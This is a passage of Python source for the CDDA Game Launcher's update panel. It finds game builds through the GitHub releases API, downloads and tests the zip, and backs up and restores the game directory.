human_delta = safe_humanize(build_date, arrow.utcnow(), locale=self.app_locale)\n self.build_value_label.setText(\n '{build} ({time_delta})'\n .format(build=self.build_number, time_delta=human_delta)\n )\n self.current_build = self.build_number\n\n status_bar.removeWidget(self.reading_label)\n status_bar.removeWidget(self.reading_progress_bar)\n\n status_bar.busy -= 1\n\n sha256 = self.exe_sha256.hexdigest()\n\n stable_version = cons.STABLE_SHA256.get(sha256, None)\n is_stable = stable_version is not None\n\n if is_stable:\n self.game_version = stable_version\n\n if self.game_version == '':\n self.game_version = _('Unknown')\n self.version_value_label.setText(\n '{version} ({type})'\n .format(version=self.game_version, type=self.version_type)\n )\n\n new_build(self.game_version, sha256, is_stable, self.build_number,\n self.build_date)\n\n main_tab = self.get_main_tab()\n update_group_box = main_tab.update_group_box\n\n update_group_box.post_extraction()\n\n else:\n self.exe_total_read += len(bytes)\n self.reading_progress_bar.setValue(self.exe_total_read)\n self.exe_sha256.update(bytes)\n\n timer.timeout.connect(timeout)\n timer.start(0)\n\n\nclass UpdateGroupBox(QGroupBox):\n def __init__(self):\n super(UpdateGroupBox, self).__init__()\n\n self.shown = False\n self.updating = False\n self.close_after_update = False\n self.builds = []\n self.progress_rmtree = None\n self.progress_copy = None\n\n self.qnam = QNetworkAccessManager()\n self.http_reply = None\n\n self.api_reply = None\n self.api_response_content = None\n\n self.find_build_count = 0\n\n layout = QGridLayout()\n\n layout_row = 0\n\n branch_label = QLabel()\n layout.addWidget(branch_label, layout_row, 0, Qt.AlignRight)\n self.branch_label = branch_label\n\n branch_button_group = QButtonGroup()\n self.branch_button_group = branch_button_group\n\n stable_radio_button = QRadioButton()\n layout.addWidget(stable_radio_button, layout_row, 1)\n self.stable_radio_button = stable_radio_button\n branch_button_group.addButton(stable_radio_button)\n\n branch_button_group.buttonClicked.connect(self.branch_clicked)\n\n experimental_radio_button = QRadioButton()\n layout.addWidget(experimental_radio_button, layout_row, 2)\n self.experimental_radio_button = experimental_radio_button\n branch_button_group.addButton(experimental_radio_button)\n\n layout_row = layout_row + 1\n\n platform_label = QLabel()\n layout.addWidget(platform_label, layout_row, 0, Qt.AlignRight)\n self.platform_label = platform_label\n\n platform_button_group = QButtonGroup()\n self.platform_button_group = platform_button_group\n\n x64_radio_button = QRadioButton()\n layout.addWidget(x64_radio_button, layout_row, 1)\n self.x64_radio_button = x64_radio_button\n platform_button_group.addButton(x64_radio_button)\n\n platform_button_group.buttonClicked.connect(self.platform_clicked)\n\n if not is_64_windows():\n x64_radio_button.setEnabled(False)\n\n x86_radio_button = QRadioButton()\n layout.addWidget(x86_radio_button, layout_row, 2)\n self.x86_radio_button = x86_radio_button\n platform_button_group.addButton(x86_radio_button)\n\n layout_row = layout_row + 1\n\n available_builds_label = QLabel()\n layout.addWidget(available_builds_label, layout_row, 0, Qt.AlignRight)\n self.available_builds_label = available_builds_label\n\n builds_combo = QComboBox()\n builds_combo.setEnabled(False)\n self.previous_bc_enabled = False\n builds_combo.addItem(_('Unknown'))\n layout.addWidget(builds_combo, layout_row, 1, 1, 2)\n self.builds_combo = builds_combo\n\n refresh_warning_label = QLabel()\n icon = QApplication.style().standardIcon(QStyle.SP_MessageBoxWarning)\n refresh_warning_label.setPixmap(icon.pixmap(16, 16))\n refresh_warning_label.hide()\n layout.addWidget(refresh_warning_label, layout_row, 3)\n self.refresh_warning_label = refresh_warning_label\n\n refresh_builds_button = QToolButton()\n refresh_builds_button.clicked.connect(self.refresh_builds)\n layout.addWidget(refresh_builds_button, layout_row, 4)\n self.refresh_builds_button = refresh_builds_button\n\n layout_row = layout_row + 1\n\n find_build_label = QLabel()\n layout.addWidget(find_build_label, layout_row, 0, Qt.AlignRight)\n self.find_build_label = find_build_label\n\n find_build_value = QLineEdit()\n find_build_value.setValidator(QRegularExpressionValidator(\n QRegularExpression(r'\\d+(-\\d+)*')))\n find_build_value.returnPressed.connect(self.find_build)\n layout.addWidget(find_build_value, layout_row, 1, 1, 2)\n self.find_build_value = find_build_value\n\n find_build_warning_label = QLabel()\n icon = QApplication.style().standardIcon(QStyle.SP_MessageBoxWarning)\n find_build_warning_label.setPixmap(icon.pixmap(16, 16))\n find_build_warning_label.hide()\n layout.addWidget(find_build_warning_label, layout_row, 3)\n self.find_build_warning_label = find_build_warning_label\n\n find_build_button = QToolButton()\n find_build_button.clicked.connect(self.find_build)\n layout.addWidget(find_build_button, layout_row, 4)\n self.find_build_button = find_build_button\n\n layout_row = layout_row + 1\n\n changelog_groupbox = QGroupBox()\n changelog_layout = QHBoxLayout()\n changelog_groupbox.setLayout(changelog_layout)\n layout.addWidget(changelog_groupbox, layout_row, 0, 1, 5)\n self.changelog_groupbox = changelog_groupbox\n self.changelog_layout = changelog_layout\n\n changelog_content = QTextBrowser()\n changelog_content.setReadOnly(True)\n changelog_content.setOpenExternalLinks(True)\n self.changelog_layout.addWidget(changelog_content)\n self.changelog_content = changelog_content\n\n layout_row = layout_row + 1\n\n update_button = QPushButton()\n update_button.setEnabled(False)\n self.previous_ub_enabled = False\n update_button.setStyleSheet('font-size: 20px;')\n update_button.clicked.connect(self.update_game)\n layout.addWidget(update_button, layout_row, 0, 1, 5)\n self.update_button = update_button\n\n layout.setColumnStretch(1, 100)\n layout.setColumnStretch(2, 100)\n\n self.setLayout(layout)\n self.set_text()\n\n def set_text(self):\n self.branch_label.setText(_('Branch:'))\n self.stable_radio_button.setText(_('Stable'))\n self.experimental_radio_button.setText(_('Experimental'))\n self.platform_label.setText(_('Platform:'))\n self.x64_radio_button.setText('{so} ({bit})'.format(so=_('Windows x64'), bit=_('64-bit')))\n self.x86_radio_button.setText('{so} ({bit})'.format(so=_('Windows x86'), bit=_('32-bit')))\n self.available_builds_label.setText(_('Available builds:'))\n self.find_build_label.setText(_('Find build #:'))\n self.find_build_button.setText(_('Add to list'))\n self.refresh_builds_button.setText(_('Refresh'))\n self.changelog_groupbox.setTitle(_('Changelog'))\n self.update_button.setText(_('Update game'))\n self.setTitle(_('Update/Installation'))\n\n def showEvent(self, event):\n if not self.shown:\n branch = get_config_value(cons.CONFIG_BRANCH_KEY)\n\n if branch is None or branch not in (cons.CONFIG_BRANCH_STABLE,\n cons.CONFIG_BRANCH_EXPERIMENTAL):\n branch = cons.CONFIG_BRANCH_EXPERIMENTAL\n\n if branch == cons.CONFIG_BRANCH_STABLE:\n self.stable_radio_button.setChecked(True)\n elif branch == cons.CONFIG_BRANCH_EXPERIMENTAL:\n self.experimental_radio_button.setChecked(True)\n\n platform = get_config_value('platform')\n\n if platform == 'Windows x64':\n platform = 'x64'\n elif platform == 'Windows x86':\n platform = 'x86'\n\n if platform is None or platform not in ('x64', 'x86'):\n if is_64_windows():\n platform = 'x64'\n else:\n platform = 'x86'\n\n if platform == 'x64':\n self.x64_radio_button.setChecked(True)\n elif platform == 'x86':\n self.x86_radio_button.setChecked(True)\n\n self.show_hide_find_build()\n\n self.refresh_builds()\n\n self.shown = True\n\n def find_build(self):\n build_number = self.find_build_value.text()\n build_number = build_number.strip()\n\n build_number = re.sub(r'[^0-9\\-]', '', build_number)\n\n if build_number == '':\n return\n\n if self.find_build_count == 0:\n url = cons.GITHUB_REST_API_URL + cons.CDDA_RELEASE_BY_TAG(cons.BUILD_TAG(build_number))\n self.find_build_count = 1\n elif self.find_build_count == 1:\n url = cons.GITHUB_REST_API_URL + cons.CDDA_RELEASE_BY_TAG(\n cons.NEW_BUILD_TAG(build_number))\n self.find_build_count = 0\n\n self.api_response_content = BytesIO()\n\n request = QNetworkRequest(QUrl(url))\n request.setRawHeader(b'User-Agent',\n b'CDDA-Game-Launcher/' + version.encode('utf8'))\n request.setRawHeader(b'Accept', cons.GITHUB_API_VERSION)\n\n self.api_reply = self.qnam.get(request)\n self.api_reply.finished.connect(self.find_build_finished)\n self.api_reply.readyRead.connect(self.find_build_ready_read)\n\n def find_build_finished(self):\n redirect = self.api_reply.attribute(\n QNetworkRequest.RedirectionTargetAttribute)\n if redirect is not None:\n redirected_url = urljoin(\n self.api_reply.request().url().toString(),\n redirect.toString())\n\n self.api_response_content = BytesIO()\n\n request = QNetworkRequest(QUrl(redirected_url))\n request.setRawHeader(b'User-Agent',\n b'CDDA-Game-Launcher/' + version.encode('utf8'))\n request.setRawHeader(b'Accept', cons.GITHUB_API_VERSION)\n\n self.api_reply = self.qnam.get(request)\n self.api_reply.finished.connect(self.find_build_finished)\n self.api_reply.readyRead.connect(self.find_build_ready_read)\n return\n \n requests_remaining = None\n if self.api_reply.hasRawHeader(cons.GITHUB_XRL_REMAINING):\n requests_remaining = self.api_reply.rawHeader(cons.GITHUB_XRL_REMAINING)\n requests_remaining = tryint(requests_remaining)\n\n reset_dt = None\n if self.api_reply.hasRawHeader(cons.GITHUB_XRL_RESET):\n reset_dt = self.api_reply.rawHeader(cons.GITHUB_XRL_RESET)\n reset_dt = tryint(reset_dt)\n reset_dt = arrow.get(reset_dt)\n\n if requests_remaining is not None and requests_remaining <= 10:\n self.warn_rate_limit(requests_remaining, reset_dt)\n \n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n\n status_code = self.api_reply.attribute(\n QNetworkRequest.HttpStatusCodeAttribute)\n if status_code != 200:\n self.api_response_content = None\n\n build_number = self.find_build_value.text()\n build_number = build_number.strip()\n\n if self.find_build_count == 0:\n status_bar.showMessage(_('Build #{build} not found on GitHub'\n ).format(build=build_number))\n return\n elif self.find_build_count == 1:\n self.find_build()\n return\n\n self.api_response_content.seek(0)\n try:\n release = json.loads(TextIOWrapper(self.api_response_content, encoding='utf8'\n ).read())\n except json.decoder.JSONDecodeError:\n release = None\n self.api_response_content = None\n\n if release is None:\n return\n \n builds = self.builds\n\n asset_platform = self.base_asset['Platform']\n asset_graphics = self.base_asset['Graphics']\n\n target_regex = re.compile(r'cataclysmdda-(?P.+)-' +\n re.escape(asset_platform) + r'-' +\n re.escape(asset_graphics) + r'-' +\n r'b?(?P\\d+)\\.zip'\n )\n \n new_asset_platform = self.new_base_asset['Platform']\n new_asset_graphics = self.new_base_asset['Graphics']\n\n new_target_regex = re.compile(\n r'cdda-windows-' +\n re.escape(new_asset_graphics) + r'-' +\n re.escape(new_asset_platform) + r'-' +\n r'b?(?P[0-9\\-]+)\\.zip'\n )\n\n build_regex = re.compile(r'[Bb]uild #?(?P[0-9\\-]+)')\n\n if any(x not in release for x in ('name', 'created_at')):\n return\n\n build_match = build_regex.search(release['name'])\n build_number = None\n if build_match is not None:\n asset = None\n if 'assets' in release:\n asset_iter = (\n x for x in release['assets']\n if 'browser_download_url' in x\n and 'name' in x\n and (\n target_regex.search(x['name']) is not None or\n new_target_regex.search(x['name']) is not None )\n )\n asset = next(asset_iter, None)\n\n build = {\n 'url': asset['browser_download_url'] if asset is not None\n else None,\n 'name': asset['name'] if asset is not None else None,\n 'number': build_match.group('build'),\n 'date': arrow.get(release['created_at']).datetime\n }\n build_number = build['number']\n\n self.find_build_value.setText('')\n\n for existing_build in builds:\n if existing_build['number'] == build_number:\n status_bar.showMessage(\n _('Build #{build} is already in the available builds list'\n ).format(build=build_number))\n return\n\n builds.append(build)\n\n status_bar.showMessage(_('Build #{build} found and added to the available builds list'\n ).format(build=build_number))\n else:\n return\n\n if len(builds) > 0:\n builds.sort(key=lambda x: (x['date'], x['number']), reverse=True)\n self.builds = builds\n\n self.builds_combo.clear()\n for build in builds:\n if build['date'] is not None:\n build_date = arrow.get(build['date'], 'UTC')\n human_delta = safe_humanize(build_date, arrow.utcnow(),\n locale=self.app_locale)\n else:\n human_delta = _('Unknown')\n\n self.builds_combo.addItem(\n '{number} ({delta})'.format(number=build['number'], delta=human_delta),\n userData=build\n )\n\n combo_model = self.builds_combo.model()\n default_set = False\n for x in range(combo_model.rowCount()):\n if combo_model.item(x).data(Qt.UserRole)['url'] is None:\n combo_model.item(x).setEnabled(False)\n combo_model.item(x).setText(combo_model.item(x).text() +\n _(' - build unavailable'))\n elif not default_set:\n default_set = True\n combo_model.item(x).setText(combo_model.item(x).text() +\n _(' - latest build available'))\n\n if (combo_model.item(x).data(Qt.UserRole)['number'] == build_number and\n combo_model.item(x).isEnabled()):\n self.builds_combo.setCurrentIndex(x)\n self.find_build_count = 0\n elif self.find_build_count == 1:\n self.find_build()\n\n def find_build_ready_read(self):\n self.api_response_content.write(self.api_reply.readAll())\n\n def update_game(self):\n if not self.updating:\n if self.builds is None or len(self.builds) < 1:\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n\n status_bar.showMessage(_('Cannot update or install the game '\n 'since no build was found'))\n return\n\n main_tab = self.get_main_tab()\n game_dir_group_box = main_tab.game_dir_group_box\n game_dir = game_dir_group_box.dir_combo.currentText()\n\n # Check if we are installing in an empty directory\n if (game_dir_group_box.exe_path is None and\n os.path.exists(game_dir) and\n os.path.isdir(game_dir)):\n\n current_scan = scandir(game_dir)\n game_dir_empty = True\n\n try:\n next(current_scan)\n game_dir_empty = False\n except StopIteration:\n pass\n\n if not game_dir_empty:\n subdir_name = 'cdda'\n subdir = os.path.join(game_dir, subdir_name)\n\n while os.path.exists(subdir):\n subdir_name = 'cdda-{0}'.format('%08x' % random.randrange(16**8))\n subdir = os.path.join(game_dir, subdir_name)\n\n new_subdirectory_msgbox = QMessageBox()\n new_subdirectory_msgbox.setWindowTitle(_('Install directory is not empty'))\n new_subdirectory_msgbox.setText(_('You cannot install the game in a directory '\n 'that is not empty. We can quickly proceed with a new subdirectory.'\n ))\n new_subdirectory_msgbox.setInformativeText(_('Can we create a new empty '\n 'subdirectory to proceed?'))\n new_subdirectory_msgbox.addButton(_('Create the {name} subdirectory and '\n 'proceed').format(name=subdir_name),\n QMessageBox.YesRole)\n new_subdirectory_msgbox.addButton(_('I will choose or create a different '\n 'directory'), QMessageBox.NoRole)\n new_subdirectory_msgbox.setIcon(QMessageBox.Question)\n\n if new_subdirectory_msgbox.exec() == 1:\n return\n \n os.makedirs(subdir)\n game_dir = subdir\n game_dir_group_box.set_dir_combo_value(subdir)\n\n if config_true(get_config_value('backup_before_update', 'False')):\n backups_tab = main_tab.get_backups_tab()\n\n backups_tab.prune_auto_backups()\n\n name = '{auto}_{name}'.format(auto=_('auto'),\n name=_('before_update'))\n\n backups_tab.after_backup = self.update_game_process\n backups_tab.backup_saves(name)\n else:\n self.update_game_process()\n\n else:\n # We are currently updating, try to cancel\n\n main_tab = self.get_main_tab()\n game_dir_group_box = main_tab.game_dir_group_box\n\n # Are we downloading the file?\n if self.download_http_reply.isRunning():\n self.download_aborted = True\n self.download_http_reply.abort()\n\n main_window = self.get_main_window()\n\n status_bar = main_window.statusBar()\n\n if game_dir_group_box.exe_path is not None:\n if status_bar.busy == 0:\n status_bar.showMessage(_('Update cancelled'))\n else:\n if status_bar.busy == 0:\n status_bar.showMessage(_('Installation cancelled'))\n elif self.clearing_previous_dir:\n if self.progress_rmtree is not None:\n self.progress_rmtree.stop()\n elif self.backing_up_game:\n self.backup_timer.stop()\n\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n\n status_bar.removeWidget(self.backup_label)\n status_bar.removeWidget(self.backup_progress_bar)\n\n status_bar.busy -= 1\n\n self.restore_backup()\n\n if game_dir_group_box.exe_path is not None:\n if status_bar.busy == 0:\n status_bar.showMessage(_('Update cancelled'))\n else:\n if status_bar.busy == 0:\n status_bar.showMessage(_('Installation cancelled'))\n\n elif self.extracting_new_build:\n self.extracting_timer.stop()\n\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n\n status_bar.removeWidget(self.extracting_label)\n status_bar.removeWidget(self.extracting_progress_bar)\n\n status_bar.busy -= 1\n\n self.extracting_zipfile.close()\n\n download_dir = os.path.dirname(self.downloaded_file)\n delete_path(download_dir)\n\n path = self.clean_game_dir()\n self.restore_backup()\n self.restore_previous_content(path)\n\n if path is not None:\n delete_path(path)\n\n if game_dir_group_box.exe_path is not None:\n if status_bar.busy == 0:\n status_bar.showMessage(_('Update cancelled'))\n else:\n if status_bar.busy == 0:\n status_bar.showMessage(_('Installation cancelled'))\n elif self.analysing_new_build:\n game_dir_group_box.opened_exe.close()\n game_dir_group_box.exe_reading_timer.stop()\n\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n\n status_bar.removeWidget(game_dir_group_box.reading_label)\n status_bar.removeWidget(game_dir_group_box.reading_progress_bar)\n\n status_bar.busy -= 1\n\n path = self.clean_game_dir()\n self.restore_backup()\n self.restore_previous_content(path)\n\n if path is not None:\n delete_path(path)\n\n if game_dir_group_box.exe_path is not None:\n if status_bar.busy == 0:\n status_bar.showMessage(_('Update cancelled'))\n else:\n if status_bar.busy == 0:\n status_bar.showMessage(_('Installation cancelled'))\n elif self.in_post_extraction:\n self.in_post_extraction = False\n\n if self.progress_copy is not None:\n self.progress_copy.stop()\n\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n status_bar.clearMessage()\n\n path = self.clean_game_dir()\n self.restore_backup()\n self.restore_previous_content(path)\n\n if path is not None:\n delete_path(path)\n\n if game_dir_group_box.exe_path is not None:\n if status_bar.busy == 0:\n status_bar.showMessage(_('Update cancelled'))\n else:\n if status_bar.busy == 0:\n status_bar.showMessage(_('Installation cancelled'))\n\n self.finish_updating()\n\n def update_game_process(self):\n main_tab = self.get_main_tab()\n game_dir_group_box = main_tab.game_dir_group_box\n game_dir = game_dir_group_box.dir_combo.currentText()\n \n logger.info(\n 'Updating CDDA...\\n'\n 'CDDAGL Directory: {}\\n'\n 'CDDA Directory: {}'\n .format(get_cddagl_path(), game_dir)\n )\n\n self.updating = True\n self.download_aborted = False\n self.clearing_previous_dir = False\n self.backing_up_game = False\n self.extracting_new_build = False\n self.analysing_new_build = False\n self.in_post_extraction = False\n\n self.selected_build = self.builds[self.builds_combo.currentIndex()]\n\n selected_branch = self.branch_button_group.checkedButton()\n experimental_selected = selected_branch is self.experimental_radio_button\n\n latest_build = self.builds[0]\n if experimental_selected and game_dir_group_box.current_build == latest_build['number']:\n confirm_msgbox = QMessageBox()\n confirm_msgbox.setWindowTitle(_('Game is up to date'))\n confirm_msgbox.setText(_('You already have the latest version.'\n ))\n confirm_msgbox.setInformativeText(_('Are you sure you want to '\n 'update your game?'))\n confirm_msgbox.addButton(_('Update the game again'),\n QMessageBox.YesRole)\n confirm_msgbox.addButton(_('I do not need to update the '\n 'game again'), QMessageBox.NoRole)\n confirm_msgbox.setIcon(QMessageBox.Question)\n\n if confirm_msgbox.exec() == 1:\n self.updating = False\n return\n\n game_dir_group_box.disable_controls()\n self.disable_controls()\n\n soundpacks_tab = main_tab.get_soundpacks_tab()\n mods_tab = main_tab.get_mods_tab()\n settings_tab = main_tab.get_settings_tab()\n backups_tab = main_tab.get_backups_tab()\n\n soundpacks_tab.disable_tab()\n mods_tab.disable_tab()\n settings_tab.disable_tab()\n backups_tab.disable_tab()\n\n try:\n if not os.path.exists(game_dir):\n os.makedirs(game_dir)\n elif os.path.isfile(game_dir):\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n\n status_bar.showMessage(_('Cannot install game on a file'))\n\n self.finish_updating()\n return\n\n download_dir = tempfile.mkdtemp(prefix=cons.TEMP_PREFIX)\n\n download_url = self.selected_build['url']\n\n url = QUrl(download_url)\n file_info = QFileInfo(url.path())\n file_name = file_info.fileName()\n\n self.downloaded_file = os.path.join(download_dir, file_name)\n self.downloading_file = open(self.downloaded_file, 'wb')\n\n self.download_game_update(download_url)\n\n except OSError as e:\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n\n self.finish_updating()\n\n status_bar.showMessage(str(e))\n\n def clean_game_dir(self):\n game_dir = self.game_dir\n dir_list = os.listdir(game_dir)\n if len(dir_list) == 0 or (\n len(dir_list) == 1 and dir_list[0] == 'previous_version'):\n return None\n\n temp_move_dir = tempfile.mkdtemp(prefix=cons.TEMP_PREFIX)\n\n excluded_entries = set(['previous_version'])\n if config_true(get_config_value('prevent_save_move', 'False')):\n excluded_entries.add('save')\n # Prevent moving the launcher if it's in the game directory\n launcher_exe = os.path.abspath(sys.executable)\n launcher_dir = os.path.dirname(launcher_exe)\n if os.path.abspath(game_dir) == launcher_dir:\n excluded_entries.add(os.path.basename(launcher_exe))\n for entry in dir_list:\n if entry not in excluded_entries:\n entry_path = os.path.join(game_dir, entry)\n shutil.move(entry_path, temp_move_dir)\n\n return temp_move_dir\n\n def restore_previous_content(self, path):\n if path is None:\n return\n\n game_dir = self.game_dir\n previous_version_dir = os.path.join(game_dir, 'previous_version')\n if not os.path.exists(previous_version_dir):\n os.makedirs(previous_version_dir)\n\n for entry in os.listdir(path):\n entry_path = os.path.join(path, entry)\n shutil.move(entry_path, previous_version_dir)\n\n def restore_backup(self):\n game_dir = self.game_dir\n previous_version_dir = os.path.join(game_dir, 'previous_version')\n\n if os.path.isdir(previous_version_dir) and os.path.isdir(game_dir):\n\n for entry in os.listdir(previous_version_dir):\n if (entry == 'save' and\n config_true(get_config_value('prevent_save_move',\n 'False'))):\n continue\n entry_path = os.path.join(previous_version_dir, entry)\n shutil.move(entry_path, game_dir)\n\n delete_path(previous_version_dir)\n\n def get_main_tab(self):\n return self.parentWidget()\n\n def get_main_window(self):\n return self.get_main_tab().get_main_window()\n\n def disable_controls(self, update_button=False):\n self.stable_radio_button.setEnabled(False)\n self.experimental_radio_button.setEnabled(False)\n\n self.x64_radio_button.setEnabled(False)\n self.x86_radio_button.setEnabled(False)\n\n self.previous_bc_enabled = self.builds_combo.isEnabled()\n self.builds_combo.setEnabled(False)\n self.refresh_builds_button.setEnabled(False)\n self.find_build_value.setEnabled(False)\n self.find_build_button.setEnabled(False)\n\n self.previous_ub_enabled = self.update_button.isEnabled()\n if update_button:\n self.update_button.setEnabled(False)\n\n def enable_controls(self, builds_combo=False):\n self.stable_radio_button.setEnabled(True)\n self.experimental_radio_button.setEnabled(True)\n\n if is_64_windows():\n self.x64_radio_button.setEnabled(True)\n self.x86_radio_button.setEnabled(True)\n\n self.refresh_builds_button.setEnabled(True)\n self.find_build_value.setEnabled(True)\n self.find_build_button.setEnabled(True)\n\n if builds_combo:\n self.builds_combo.setEnabled(True)\n else:\n self.builds_combo.setEnabled(self.previous_bc_enabled)\n\n self.update_button.setEnabled(self.previous_ub_enabled)\n\n def download_game_update(self, url):\n main_window = self.get_main_window()\n\n status_bar = main_window.statusBar()\n status_bar.clearMessage()\n\n status_bar.busy += 1\n\n downloading_label = QLabel()\n downloading_label.setText(_('Downloading: {0}').format(url))\n status_bar.addWidget(downloading_label, 100)\n self.downloading_label = downloading_label\n\n dowloading_speed_label = QLabel()\n status_bar.addWidget(dowloading_speed_label)\n self.dowloading_speed_label = dowloading_speed_label\n\n downloading_size_label = QLabel()\n status_bar.addWidget(downloading_size_label)\n self.downloading_size_label = downloading_size_label\n\n progress_bar = QProgressBar()\n status_bar.addWidget(progress_bar)\n self.downloading_progress_bar = progress_bar\n progress_bar.setMinimum(0)\n\n self.download_last_read = datetime.utcnow()\n self.download_last_bytes_read = 0\n self.download_speed_count = 0\n\n request = QNetworkRequest(QUrl(url))\n request.setRawHeader(b'User-Agent',\n b'CDDA-Game-Launcher/' + version.encode('utf8'))\n\n self.download_http_reply = self.qnam.get(request)\n self.download_http_reply.finished.connect(self.download_http_finished)\n self.download_http_reply.readyRead.connect(\n self.download_http_ready_read)\n self.download_http_reply.downloadProgress.connect(\n self.download_dl_progress)\n\n main_tab = self.get_main_tab()\n game_dir_group_box = main_tab.game_dir_group_box\n\n if game_dir_group_box.exe_path is not None:\n self.update_button.setText(_('Cancel update'))\n else:\n self.update_button.setText(_('Cancel installation'))\n\n def download_http_finished(self):\n self.downloading_file.close()\n\n main_window = self.get_main_window()\n\n status_bar = main_window.statusBar()\n status_bar.removeWidget(self.downloading_label)\n status_bar.removeWidget(self.dowloading_speed_label)\n status_bar.removeWidget(self.downloading_size_label)\n status_bar.removeWidget(self.downloading_progress_bar)\n\n status_bar.busy -= 1\n\n if self.download_aborted:\n download_dir = os.path.dirname(self.downloaded_file)\n delete_path(download_dir)\n else:\n redirect = self.download_http_reply.attribute(\n QNetworkRequest.RedirectionTargetAttribute)\n if redirect is not None:\n redirected_url = urljoin(\n self.download_http_reply.request().url().toString(),\n redirect.toString())\n\n downloading_label = QLabel()\n downloading_label.setText(_('Downloading: {0}').format(\n redirected_url))\n status_bar.addWidget(downloading_label, 100)\n self.downloading_label = downloading_label\n\n dowloading_speed_label = QLabel()\n status_bar.addWidget(dowloading_speed_label)\n self.dowloading_speed_label = dowloading_speed_label\n\n downloading_size_label = QLabel()\n status_bar.addWidget(downloading_size_label)\n self.downloading_size_label = downloading_size_label\n\n progress_bar = QProgressBar()\n status_bar.addWidget(progress_bar)\n self.downloading_progress_bar = progress_bar\n progress_bar.setMinimum(0)\n\n self.download_last_read = datetime.utcnow()\n self.download_last_bytes_read = 0\n self.download_speed_count = 0\n\n request = QNetworkRequest(QUrl(redirected_url))\n request.setRawHeader(b'User-Agent',\n b'CDDA-Game-Launcher/' + version.encode('utf8'))\n\n self.downloading_file = open(self.downloaded_file, 'wb')\n\n self.download_http_reply = self.qnam.get(request)\n self.download_http_reply.finished.connect(\n self.download_http_finished)\n self.download_http_reply.readyRead.connect(\n self.download_http_ready_read)\n self.download_http_reply.downloadProgress.connect(\n self.download_dl_progress)\n\n return\n\n # Test downloaded file\n status_bar.showMessage(_('Testing downloaded file archive'))\n\n class TestingZipThread(QThread):\n completed = pyqtSignal()\n invalid = pyqtSignal()\n not_downloaded = pyqtSignal()\n\n def __init__(self, downloaded_file):\n super(TestingZipThread, self).__init__()\n\n self.downloaded_file = downloaded_file\n\n def __del__(self):\n self.wait()\n\n def run(self):\n try:\n with zipfile.ZipFile(self.downloaded_file) as z:\n if z.testzip() is not None:\n self.invalid.emit()\n return\n except zipfile.BadZipFile:\n self.not_downloaded.emit()\n return\n\n self.completed.emit()\n\n def completed_test():\n self.test_thread = None\n\n status_bar.clearMessage()\n self.clear_previous_dir()\n\n def invalid():\n self.test_thread = None\n\n status_bar.clearMessage()\n status_bar.showMessage(_('Downloaded archive is invalid'))\n\n download_dir = os.path.dirname(self.downloaded_file)\n delete_path(download_dir)\n self.finish_updating()\n\n def not_downloaded():\n self.test_thread = None\n\n status_bar.clearMessage()\n status_bar.showMessage(_('Could not download game'))\n\n download_dir = os.path.dirname(self.downloaded_file)\n delete_path(download_dir)\n self.finish_updating()\n\n test_thread = TestingZipThread(self.downloaded_file)\n test_thread.completed.connect(completed_test)\n test_thread.invalid.connect(invalid)\n test_thread.not_downloaded.connect(not_downloaded)\n test_thread.start()\n\n self.test_thread = test_thread\n\n def clear_previous_dir(self):\n self.clearing_previous_dir = True\n\n main_tab = self.get_main_tab()\n game_dir_group_box = main_tab.game_dir_group_box\n\n game_dir = game_dir_group_box.dir_combo.currentText()\n self.game_dir = game_dir\n\n backup_dir = os.path.join(game_dir, 'previous_version')\n if os.path.isdir(backup_dir):\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n\n status_bar.showMessage(_('Deleting {name}').format(\n name=_('previous_version directory')))\n\n if delete_path(backup_dir):\n self.backup_current_game()\n else:\n status_bar.showMessage(_('Update cancelled - Could not delete '\n 'the {name}.').format(name=_('previous_version directory')))\n self.finish_updating()\n else:\n self.backup_current_game()\n\n def backup_current_game(self):\n self.clearing_previous_dir = False\n self.progress_rmtree = None\n\n self.backing_up_game = True\n\n main_tab = self.get_main_tab()\n game_dir_group_box = main_tab.game_dir_group_box\n\n game_dir = game_dir_group_box.dir_combo.currentText()\n self.game_dir = game_dir\n\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n\n backup_dir = os.path.join(game_dir, 'previous_version')\n\n dir_list = os.listdir(game_dir)\n self.backup_dir_list = dir_list\n\n if (config_true(get_config_value('prevent_save_move', 'False'))\n and 'save' in dir_list):\n dir_list.remove('save')\n\n launcher_exe = os.path.abspath(sys.executable)\n launcher_dir = os.path.dirname(launcher_exe)\n if os.path.abspath(game_dir) == launcher_dir:\n launcher_name = os.path.basename(launcher_exe)\n if launcher_name in dir_list:\n dir_list.remove(launcher_name)\n\n if len(dir_list) > 0:\n status_bar.showMessage(_('Backing up current game'))\n\n status_bar.busy += 1\n\n backup_label = QLabel()\n status_bar.addWidget(backup_label, 100)\n self.backup_label = backup_label\n\n progress_bar = QProgressBar()\n status_bar.addWidget(progress_bar)\n self.backup_progress_bar = progress_bar\n\n timer = QTimer(self)\n self.backup_timer = timer\n\n progress_bar.setRange(0, len(dir_list))\n\n os.makedirs(backup_dir)\n self.backup_dir = backup_dir\n self.backup_index = 0\n self.backup_current_display = True\n\n def timeout():\n self.backup_progress_bar.setValue(self.backup_index)\n\n if self.backup_index == len(self.backup_dir_list):\n self.backup_timer.stop()\n\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n\n status_bar.removeWidget(self.backup_label)\n status_bar.removeWidget(self.backup_progress_bar)\n\n status_bar.busy -= 1\n status_bar.clearMessage()\n\n self.backing_up_game = False\n self.extract_new_build()\n\n else:\n backup_element = self.backup_dir_list[self.backup_index]\n\n if self.backup_current_display:\n self.backup_label.setText(_('Backing up {0}').format(\n backup_element))\n self.backup_current_display = False\n else:\n srcpath = os.path.join(self.game_dir, backup_element)\n if not move_path(srcpath, self.backup_dir):\n self.backup_timer.stop()\n\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n\n status_bar.removeWidget(self.backup_label)\n status_bar.removeWidget(self.backup_progress_bar)\n\n status_bar.busy -= 1\n status_bar.clearMessage()\n\n self.finish_updating()\n\n msg = (_('Could not move {srcpath} in {dstpath} .')\n ).format(\n srcpath=srcpath,\n dstpath=self.backup_dir\n )\n\n status_bar.showMessage(msg)\n\n self.backup_index += 1\n self.backup_current_display = True\n\n timer.timeout.connect(timeout)\n timer.start(0)\n 